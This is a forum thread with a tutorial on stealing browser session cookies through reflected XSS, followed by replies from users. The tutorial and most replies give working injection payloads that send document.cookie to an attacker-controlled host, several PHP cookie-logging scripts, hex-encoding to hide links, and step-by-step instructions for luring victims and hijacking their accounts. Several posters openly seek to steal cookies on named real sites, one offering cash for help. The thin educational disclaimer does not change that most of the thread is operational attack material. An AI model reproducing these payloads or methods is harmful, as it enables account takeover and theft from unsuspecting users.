Go4Expert

Go4Expert (http://www.go4expert.com/)
-   Ethical hacking Tips (http://www.go4expert.com/articles/ethical-hacking-tutorials/)
-   -   Stealing Cookie With XSS (http://www.go4expert.com/articles/stealing-cookie-xss-t17066/)

fourthdimension 23Apr2009 12:09

Stealing Cookie With XSS
 

Introduction



I thought it was about time for someone to post a cookie stealing tutorial, so I decided to write one for you from the ground up.

NOTE: Again... this was written to educate you on the security aspects of the following information, not to teach you how to break the law or do something stupid. Use what you learn from this to make your website more secure/use better browsing habits, not break into other websites.

Background



First, make sure you've read these two articles because I'm going to assume you already understand everything written in them:

XSS Complete Guide
All About Cookies and Security

Now we need to understand a bit more about how XSS actually works before moving on. From the above article, you already know a bit of the theory behind XSS, so we'll get right to the code. Let's say a web page has a search function that uses this code:

Code:

<tr><td>Name</td><td><input type="text" name="advisor_name" value=""></td></tr>
We want to exploit this page using XSS. How do we do that? We know that we want to inject our own script into the value field (this field is tied to the search box we can enter text into). We could start by using a test script:

Code:

<script>alert("test")</script>
When we enter this into the search box and click search, nothing happens. Why? It's still inside the value quotes, which turn the entire script into plaintext. If you look at the page source now, you see that the above portion of code now looks like this:

Code:

<tr><td>Name</td><td><input type="text" name="advisor_name" value="<script>alert("test")</script>"></td></tr>
Note the quotes around our script. So what do we do? We need to end the value field before our script can actually be executed. So we tweak our test injection a bit:

Code:

"><script>alert("test")</script>
This should close the quotes end the input section so that our script can be rendered as a part of the source instead of plaintext. And now when we hit enter we get a nice pop-up box saying "test", showing us our script was executed. Keep in mind that you're not actually writing this data to the server (unless you're injecting it with a script that actually modifies the page on the server's end also, like a guestbook or comment script), just changing how the dynamic page is acting on your end. If you want someone else to see what you see when you use this injection, you need to send them the link with that injection already in the page. For example,
Code:

http://www.site.com/search.php?q="><script>alert("test")</script>
Of course, if you don't want the recipient to see the injection, you'll need to hex the query. You can do that here:
Code:

http://centricle.com/tools/ascii-hex/
Hexing the query of this url gives us
Code:

http://www.site.com/search.php?q=%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%74%65%73%74%22%29%3c%2 f%73%63%72%69%70%74%3e
The above is a very simple case of finding an XSS injection vulnerability. Some html and javascript knowledge is definitely helpful for finding more complicated ones, but code like the above works often enough.

Using XSS to Steal Cookies



OK, so now you know the page is vulnerable to XSS injection. Great. Now what? You want to make it do something useful, like steal cookies. Cookie stealing is when you insert a script into the page so that everyone that views the modified page inadvertently sends you their session cookie. By modifying your session cookie (see the above linked tutorial), you can impersonate any user who viewed the modified page. So how do you use XSS to steal cookies?

The easiest way is to use a three-step process consisting of the injected script, the cookie recorder, and the log file.

First you'll need to get an account on a server and create two files, log.txt and whateveryouwant.php. You can leave log.txt empty. This is the file your cookie stealer will write to. Now paste this php code into your cookie stealer script (whateveryouwant.php):

Code:


<?php

function GetIP()
{
        if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
                $ip = getenv("HTTP_CLIENT_IP");
        else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
                $ip = getenv("HTTP_X_FORWARDED_FOR");
        else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
                $ip = getenv("REMOTE_ADDR");
        else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
                $ip = $_SERVER['REMOTE_ADDR'];
        else
                $ip = "unknown";
        return($ip);
}

function logData()
{
        $ipLog="log.txt";
        $cookie = $_SERVER['QUERY_STRING'];
        $register_globals = (bool) ini_get('register_gobals');
        if ($register_globals) $ip = getenv('REMOTE_ADDR');
        else $ip = GetIP();

        $rem_port = $_SERVER['REMOTE_PORT'];
        $user_agent = $_SERVER['HTTP_USER_AGENT'];
        $rqst_method = $_SERVER['METHOD'];
        $rem_host = $_SERVER['REMOTE_HOST'];
        $referer = $_SERVER['HTTP_REFERER'];
        $date=date ("l dS of F Y h:i:s A");
        $log=fopen("$ipLog", "a+");

        if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
                fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>");
        else
                fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n");
        fclose($log);
}

logData();

?>

This script will record the cookies of every user that views it.

Now we need to get the vulnerable page to access this script. We can do that by modifying our earlier injection:

Code:

"><script language= "JavaScript">document.location="http://yoursite.com/whateveryouwant.php?cookie=" + document.cookie;document.location="http://www.whateversite.com"</script>
yoursite.com is the server you're hosting your cookie stealer and log file on, and whateversite.com is the vulnerable page you're exploiting. The above code redirects the viewer to your script, which records their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don't know anything happened. Note that this injection will only work properly if you aren't actually modifying the page source on the server's end. Otherwise the unmodified page will actually be the modified page and you'll end up in an endless loop. While this is a working solution, we could eliminate this potential issue when using source-modifying injections by having the user click a link that redirects them to our stealer:

Code:

"><a href="#" onclick="document.location='http://yoursite.com/whateveryouwant.php?cookie=' +escape(document.cookie);"><Click Me></a></script>
This will eliminate the looping problem since the user has to cilck on it for it to work, and it's only a one-way link. Of course, then the user's trail ends at your cookie stealing script, so you'd need to modify that code a little to keep them from suspecting what's going on. You Could just add some text to the page saying something like "under construction" by changing the end of our php script from this:

Code:

logData();
?>

to this:
Code:

logData();

echo '<b>Page Under Construction</b>'
?>

Now when you open log.txt, you should see something like this:

Code:


IP: 125.16.48.169 | PORT: 56840 | HOST:  |  Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/2009032711 Ubuntu/8.10 (intrepid) Firefox/3.0.8 | METHOD:  | REF: http://www.ifa.org.nz/search.php | 

DATE: Tuesday 21st 2009f April 2009 05:04:07 PM | COOKIE:  cookie=PHPSESSID=889c6594db2541db1666cefca7537373

You will most likely see many other fields besides PHPSESSID, but this one is good enough for this example. Now remember how to edit cookies like I showed you earlier? Open up firebug and add/modify all your cookie's fields to match the data from the cookie in your log file and refresh the page. The server thinks you're the user you stole the cookie from. This way you can log into accounts and many other things without even needing to know the passwords or usernames.

Summary



So in summary:
1. Test the page to make sure it's vulnerable to XSS injections.
2. Once you know it's vulnerable, upload the cookie stealer php file and log file to your server.
3. Insert the injection into the page via the url or text box.
4. Grab the link of that page with your exploited search query (if injection is not stored on the server's copy of the page).
5. Get someone to use that link if necessary.
6. Check your log file for their cookie.
7. Modify your own cookie to match the captured one and refresh the page.

References



I originally posted this article on TechMafias.com but reposted it here for the go4expert community.
Code:

http://techmafias.com/forum/Thread-tutorial-cookie-stealing-with-xss

shabbir 23Apr2009 12:52

Re: Stealing Cookie With XSS
 
Nice Article :D

fourthdimension 23Apr2009 21:14

Re: Stealing Cookie With XSS
 
Thanks :)

indiansword 26Apr2009 23:29

Re: Stealing Cookie With XSS
 
If you guyz want to pratice these XSS and if u cant find a vulnerable website, then you can try following link.

www.TechMafias.com/xss_practice

hanleyhansen 27Apr2009 19:55

Re: Stealing Cookie With XSS
 
Nice.

namesis 28Apr2009 07:49

Re: Stealing Cookie With XSS
 
nice, thanks.

shabbir 3May2009 11:57

Re: Stealing Cookie With XSS
 
Nominate this article of the month for April 2009

fourthdimension 7May2009 12:03

Re: Stealing Cookie With XSS
 
Quote:

Originally Posted by shabbir (Post 46941)

Apparently it's not elgible.

shabbir 7May2009 13:14

Re: Stealing Cookie With XSS
 
Quote:

Originally Posted by fourthdimension (Post 47244)
Apparently it's not elgible.

Agreed. Sorry for the confusion.

fourthdimension 7May2009 17:51

Re: Stealing Cookie With XSS
 
No problem.

m93 13Nov2009 23:35

Re: Stealing Cookie With XSS
 
tnx.it waz very useful

i have some questions.
if i give the users cookies. can i manage that cooki(for refresh) except firefox)for example oper.manage cookies in opera is easy) and i must edit sid yes? tnx
(i inserted the link in phpbb forum. when the users clcik on that their cookie save in log.txt? and for refresh their cookies i dont nedd the usernames?

tnx

Toddie 9Jan2010 11:12

Re: Stealing Cookie With XSS
 
I am testing a xss vulnerability but your script does not work.
your script redirects but does not log cookies.

I am using this script right now and it works fine.

xss injection<script>document.location='url/cookiestealer.php?cookie='+escape(document.cookie) </script>

when i use this injection code cookies are logged into cookies.txt via this script

cookiestealer.php
Quote:

<?php
$cookie = $_GET['cookie'];
$log = fopen("cookies.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
This works fine but it does not redirect to a new page. I tried adding redirect code to the injected code and also to the .php file itself and there has been no success. Tampering with the code tends to redirect the page before the logging function executes, or does not redirect the page at all, or both.


I tried your script and it does not work.
why does your script not log cookies? where is the error? If you can't answer that question then here is another question.

what do I need to do to get my script able to redirect to another page after it executes?

m93 11Jan2010 14:13

Re: Stealing Cookie With XSS
 
Quote:

Originally Posted by Toddie (Post 62837)
I am testing a xss vulnerability but your script does not work.
your script redirects but does not log cookies.

I am using this script right now and it works fine.

xss injection<script>document.location='url/cookiestealer.php?cookie='+escape(document.cookie) </script>

when i use this injection code cookies are logged into cookies.txt via this script

cookiestealer.php


This works fine but it does not redirect to a new page. I tried adding redirect code to the injected code and also to the .php file itself and there has been no success. Tampering with the code tends to redirect the page before the logging function executes, or does not redirect the page at all, or both.


I tried your script and it does not work.
why does your script not log cookies? where is the error? If you can't answer that question then here is another question.

what do I need to do to get my script able to redirect to another page after it executes?

i downloaded the scriptsthis topic. script doesnt have problem? plz explain if i want steal users cookie (in forums) what should i do? (step by step) tnx a lot

Toddie 12Jan2010 21:41

Re: Stealing Cookie With XSS
 
now this is instructions for my script.
you need to use cookiestealer.php from my post.
you can add h t t p : / / w w w . before the sites name yourself because it will not allow me to post them with this because it gives me an error saying I have too many live links in my post. (take out the spaces)

step 1: find an injection point. i assume you have already done all of this.
for me i found this url because i could not find a place to inject it into a page.
site.com/forums/search.php?query=123456

step 2:
i then erase 123456 and add "> for my injection.

then I add the code I want it to do.

<script>alert(document.cookie);</script>

here is the finished url. if it works, then you will get a popup box that gives you your cookie.

site.com/forums/search.php?query="><script>alert(document.cookie); </script>

step 3: you need to add files to your own server.
for me the files were cookiestealer.php and cookie.txt.
you can find cookiestealer.php in my post and you can create cookie.txt
cookie.txt is an empty .txt file.

step 4:
then you post this link or send it in pm and get people to click it
site.com/forums/search.php?query="><script>document.location='MYsi te.com/cookiestealer.php?cookie='+escape(document.cookie) </script>

now when someone clicks that link their cookie will be saved in cookie.txt on your server.
you just edit the cookie with firebug or whatever you use so that the info in the cookie is replaced with the victims cookie.

step 5:
refresh the page you are on at the site and you should be logged in as that user without needing to enter user name or password or anything.

*if you are trying to steal the cookies of an admin you should know that most administrator control panels force you to re-enter your password to access the administrator control panel so cookies will not allow you to access this. you can usually moderate the forums without any password prompt though. but of course as soon as they see this they will fix whatever you did.

__________________________________________________ _________________________________

now if someone could kindly tell me how to redirect this cookiestealer.php page to another webpage?
otherwise its obvious to the victim that they just got their cookie stolen!

anyone?

this should be simple code but I guess I just don't understand the ins and outs of the code.
I tried a few different ways to redirect the page but none are working. I understand what I need to add for code and I am able to make the page redirect under normal circumstances, but the problem is that the code conflicts with the other code I have and either renders it unworkable or simply redirects the page without allowing the code to execute. I am sure its a simple syntax error or placement of the code for an experienced user it would be easy to find. like I said i tried to redirect in the url itself and in the cookiestealer.php file but I cannot get it to function correctly.

here is one example I tried to add to the file but it does not work.
echo '<script type="text/javascript">setTimeout("location.href=\'newsite.co m\'",1*1000)</script>';

please help with this.

farnoise 14Jan2010 06:11

Re: Stealing Cookie With XSS
 
Just great,
Really straight forward, The only problem that I'm having is its not send me the COOKIE I have everything else but not the cookie.
Here is a sample line of my log file


IP: 24.132.23.14 | PORT: 52020 | HOST: | Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.31318; .NET CLR 3.5.30729) | METHOD: | REF: facebook.com | DATE: Wednesday 13th 2010f January 2010 06:48:06 PM | COOKIE:



I'd appreciate any help and thanks again

Toddie 14Jan2010 09:44

Re: Stealing Cookie With XSS
 
yeah i already made a comment that the script does not work. I do not know why perhaps it is outdated and only used for older browsers.

at least it prints information for you. for me the file remained blank and nothing was printed.

the script I provided is very simple and works. it gives you the cookie and nothing else... which is all you really need anyways.

I am still waiting for someone to take a look at my script and figure out how to make it redirect to a new page while retaining the functionality of the script itself.

I have a feeling I should not hold my breath.

indiansword 15Jan2010 01:58

Re: Stealing Cookie With XSS
 
This shud help

PHP Code:

 <?php
$cookie 
$_GET['c'];
$ip getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp fopen('cookies.html''a');
fwrite($fp'Cookie: '.$cookie.'<br> IP: ' .$ip'<br> Date and Time: ' .$date'<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: http://www.yourhost.com");
?>


Toddie 15Jan2010 02:09

Re: Stealing Cookie With XSS
 
That did not work.

What that did is write all information EXCEPT the cookie. and also it did not redirect the page.

indiansword 15Jan2010 02:11

Re: Stealing Cookie With XSS
 
it works fine. There shud be something tricky on the site that ur trying it. whats the scripting ur using to steal the cookies?

Toddie 15Jan2010 02:36

Re: Stealing Cookie With XSS
 
I am not able to inject the code into the site. I am Injecting it into a search query.
The "victim" must click on the link either in a post or a pm that I send them.

Here is an example of the link.
I changed the site name for confidentiality purposes of course.

h t t p : / / w w w .victimsite.com/forums/search.php?query="><script>document.location='h t t p : / / w w w.mysite.com/cookiestealer.php?cookie='+escape(document.cookie) </script>

when I use your script with that link, it displays the info except for the cookie and also it does not redirect.

the script I mention in my first post does work, and i really only need the cookie not all the other info but I would like to get it to redirect which it currently does not.

Also i might note that I tried putting a redirect in the url itself but then the cookiestealer.php does not do anything at all and it simply redirects without logging anything.

if you would like to test it out on your own test server or some free site then I can pm you more details about what the site is that I am doing this on.

indiansword 15Jan2010 10:38

Re: Stealing Cookie With XSS
 
The script that you are trying is wrong. Try this:

http:// w w w .victimsite.com/forums/search.php?query="><script>document.location="http ://yoursite.com/cookiestealer?c=" + document.cookie</script>

Toddie 15Jan2010 22:46

Re: Stealing Cookie With XSS
 
Thank you for your timely responses.

After using that code I am now getting the information and the cookie logged properly.
however the page still does not redirect.

I am using firefox 3.5.7 I don't know if that makes any difference.

indiansword 15Jan2010 22:47

Re: Stealing Cookie With XSS
 
pm me with the info..

Toddie 17Jan2010 05:40

Re: Stealing Cookie With XSS
 
turns out the issue is the host, the code works fine.

m93 16Feb2010 12:34

Re: Stealing Cookie With XSS
 
if i want test this script on myself what should i do? (logging in a forum or test that in firefox or ie?)

ginoside021 10Apr2010 18:47

Re: Stealing Cookie With XSS
 
Quote:

Originally Posted by indiansword (Post 63019)
pm me with the info..

can you teach me how to make this cookiestealer

indiansword 10Apr2010 20:31

Re: Stealing Cookie With XSS
 
Quote:

Originally Posted by ginoside021 (Post 66969)
can you teach me how to make this cookiestealer

Go through this entire thread. I think i have explained most of the things.

ginoside021 11Apr2010 19:10

Re: Stealing Cookie With XSS
 
Quote:

Originally Posted by indiansword (Post 66970)
Go through this entire thread. I think i have explained most of the things.

i tried to make one regarding on the tut but mine is not workin can you help me plsss

i add you in my yahoo inocentjacky is my yahoo ID plssss

shadowman32 26Jun2010 22:10

Re: Stealing Cookie With XSS
 
i dont understand something...

for example if i put this cod as a index page

<a href="javascript:void(document.location='h t t p://tefutingat.net23.net/steal/steal.php?cookie='+
document.cookie)">Click Me</a>

and then send a pm to the victim to acces the link tefutingat.net23.net/steal the script will work? note that the script will open the index page and when the victim click click me the script will do his job

i guess i do something wrong because none of them works. below are the stealer script that i use:
1
HTML Code:

<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>

2
HTML Code:

<?php

function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}

function logData()
{
    $ipLog="log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_gobals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['METHOD'];
    $rem_host = $_SERVER['REMOTE_HOST'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date=date ("l dS of F Y h:i:s A");
    $log=fopen("$ipLog", "a+");

    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n");
    fclose($log);
}

logData();

echo '<b>Page Under Construction</b>'

?>

3
HTML Code:

<?php
$cookie = $_GET['c'];
$ip = getenv (‘REMOTE_ADDR’);
$date=date(“j F, Y, g:i a”);;
$referer=getenv (‘HTTP_REFERER’);
$fp = fopen(‘cookies.html’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’<br>
IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Referer: ‘.$referer.’<br><br><br>’);
fclose($fp);
header (“Location:TechMafias”);
?>

Please help me...my account on a web site was stolen and i want to get it back.

Toddie 26Jun2010 22:34

Re: Stealing Cookie With XSS
 
Quote:

Originally Posted by shadowman32 (Post 69672)

i guess i do something wrong because none of them works. below are the stealer script that i use:

try using a different web host.

shadowman32 27Jun2010 02:34

Re: Stealing Cookie With XSS
 
i have changed the host but stil dosent work...i get something like this

HTML Code:

IP: 92.83.149.140 | PORT: 25710 | HOST:  |  Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.25 Safari/532.5 | METHOD:  | REF: h t t p ://extra-ratie.hi2.ro/ |  DATE: Saturday 26th 2010f June 2010 11:54:17 PM | COOKIE:  cookie=
the script dosent "steal" the cookie...

Can someone give me a good script?...i want to send the link that victim will acces via PM.

m93 29Jun2010 15:45

Re: Stealing Cookie With XSS
 
this code is completely out of work!!! it didnt work for me. i think its better to forget about stealing cookie..i couldnt find useful codes anywhere

shadowman32 30Jun2010 13:31

Re: Stealing Cookie With XSS
 
i will keep searching until i will found a good XSS cookie stealer script...and i will post it here when i will found it.

thanks for help

rayjay 12Jan2011 08:29

Re: Stealing Cookie With XSS
 
for example if i put this cod as a index page

<a href="javascript:void(document.location='h t t p://tefutingat.net23.net/steal/steal.php?cookie='+
document.cookie)">Click Me</a>

and then send a pm to the victim to acces the link tefutingat.net23.net/steal the script will work? note that the script will open the index page and when the victim click click me the script will do his job

i guess i do something wrong because none of them works. below are the stealer script that i use:
1
HTML Code:

<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>

2
HTML Code:

<?php

function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) &&  $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'],  "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}

function logData()
{
    $ipLog="log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_gobals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['METHOD'];
    $rem_host = $_SERVER['REMOTE_HOST'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date=date ("l dS of F Y h:i:s A");
    $log=fopen("$ipLog", "a+");

    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : }  $date | COOKIE:  $cookie <br>");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE:  $date | COOKIE:  $cookie \n\n");
    fclose($log);
}

logData();

echo '<b>Page Under Construction</b>'

?>

3
HTML Code:

<?php
$cookie = $_GET['c'];
$ip = getenv (‘REMOTE_ADDR’);
$date=date(“j F, Y, g:i a”);;
$referer=getenv (‘HTTP_REFERER’);
$fp = fopen(‘cookies.html’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’<br>
IP: ‘ .$ip. ‘<br> Date  and Time: ‘ .$date. ‘<br> Referer:  ‘.$referer.’<br><br><br>’);
fclose($fp);
header (“Location:TechMafias”);
?>

Please help me...my account on a web site was stolen and i want to get it back.

rayjay 12Jan2011 08:30

Re: Stealing Cookie With XSS
 
Does anybody know where my code doesn't work? It displays everything but the cookie. The site is kind of trick but it allows [img][/img] and .. which translates into html code as <img src=""></img> and <a href=""></a>.

My PHP:

1
HTML Code:

<?php
$cookie =$HTTP_GET_VARS["cookie"];
$date = date ("l ds of F Y h:i:s A");
$ip = $_SERVER['REMOTE_ADDR'];
$file = fopen('log.txt', 'a');
fwrite($file,"DATE : $date || IP: $ip || COOKIE : $cookie \n");
fclose($file);
?>

I've tried many different modifications on the site. For example,

rayjay 12Jan2011 08:33

Re: Stealing Cookie With XSS
 
I can't understand how this forum works properly lol. The website is crossfire.nu is that helps anybody. Posts are done via UBBcode. I hope somebody can help.

Indianman, tenu punjabi aandi ah?

rayjay 12Jan2011 08:44

Re: Stealing Cookie With XSS
 
So if somebody can tell me the problem it would be really nice .. anybody that is willing to help me and can help me steal cookies of this site will receive a cash reward aswell :P

marehotz 28Feb2011 20:18

Re: Stealing Cookie With XSS
 
admin , i want to hack a lineage 2 website and log as administrator . Is that possible? pls reply



Thx.

Mr.sp41t3r 18May2011 18:14

Re: Stealing Cookie With XSS
 
thank you

nikita 13Dec2012 16:42

Re: Stealing Cookie With XSS
 
sir my log.txt file contains only JSESSIONID=some value;

can u pls tell me what to do with JSESSIONID.


All times are GMT +5.5. The time now is 05:22.